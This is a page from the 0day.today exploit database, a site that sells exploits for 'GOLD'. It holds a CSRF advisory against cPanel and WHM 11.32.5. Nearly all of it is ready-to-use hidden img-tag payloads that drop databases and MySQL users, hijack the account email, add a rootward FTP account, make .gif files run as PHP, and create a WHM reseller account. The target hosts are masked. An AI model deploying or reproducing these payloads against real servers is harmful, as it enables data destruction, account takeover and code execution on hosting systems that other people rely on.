0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
cpanel 11.32.5 (build 11) 11.32.5.11 CSRF Vulnerabilities
========== Vulnerable Software: cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ] Vulnerability: CSRF Vendor: cpanel.net ========== ===================================================================== Tested version: Your current cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ] Aka: Cpanel Accelerated 2 via WHM 11.32.5 (build 11) ===================================================================== CSRF: Drop Database: (Method $_GET) <img src="http://***********.net:2082/frontend/x3/sql/deldb.html?db=armenian_music" heigth="0" width="0" /> Here we are going to drop database named: armenian_music ===================================================================== CSRF: Drop mysql user: (Method $_GET) <img src="http://************.net:2082/frontend/x3/sql/deluser.html?user=armenian_adserve" heigth="0" width="0" /> Here we are going to drop mysql user named: armenian_adserver )) ===================================================================== CSRF: Change email address: (Contact Information & Preferences) (Method $_GET) Changing email address to: owned_and_owned_again@gmail.tld <img src="http://***********.net:2082/frontend/x3/contact/saveemail.html?email=owned_and_owned_again%40gmail.tld&sec ond_email=¬ify_disk_limit=1¬ify_bandwidth_limit=1¬ify_email_quota_limit=1" heigth="0" width="0" /> ===================================================================== CSRF adding FTP account: username: akastep password: akastep host is target host. <img src="http://***********.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_ jsonapi_func=addftp&user=akastep&pass=akastep&homedir=/"a=0&cache_fix=owned_by_akastep" heigth="0" width="0" /> ===================================================================== CSRF Drop FTP account: Deletes existent ftp account named: axaxa <img src="http://************.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel _jsonapi_func=delftp&user=axaxa&cache_fix=OWNED" heigth="0" width="0" /> ===================================================================== CSRF change Apache handler: (Parse .gif file as php script) <img src="http://***********.net:2082/frontend/x3/mime/addhandle.html?handle=application/x-httpd-php&ext=.gif&su bmit=Add" heigth="0" width="0" /> ===================================================================== CSRF Delete handler: <img src="http://***********.net:2082/frontend/x3/mime/delhandle.html?userhandle=.php" heigth="0" width="0" /> ===================================================================== WHM 11.32.5 (build 11) CSRF: Add Reseller+setup with domain: owned.com username: owned111 password: MYVERYSTRONGGOESHERE And contact email: owned@owned1.you <img src="http://***********.net:2086/scripts5/wwwacct?sign=&plan=Reseller+setup&domain=owned.com&username=o wned111&password=MYVERYSTRONGGOESHERE&contactemail=owned%40owned1.you&dbuser=owned&msel=n%2Cy%2C1%2Cn%2C x3%2C1%2C1%2C1%2C1%2C1%2C1000%2Cn%2C0%2C0%2Cdefault%2Cen%2C%2C%2CReseller+setup&pkgname=&featurelist=default& ;quota=1&bwlimit=1000&maxftp=1&maxpop=1&maxlst=1&maxsql=1&maxsub=1&maxpark=0&maxaddon=0& amp;cgi=1&cpmod=x3&language=en&hasuseregns=1&dkim=1&mxcheck=local" heigth="0" width="0" /> ================================================ # 0day.today [2024-11-16] #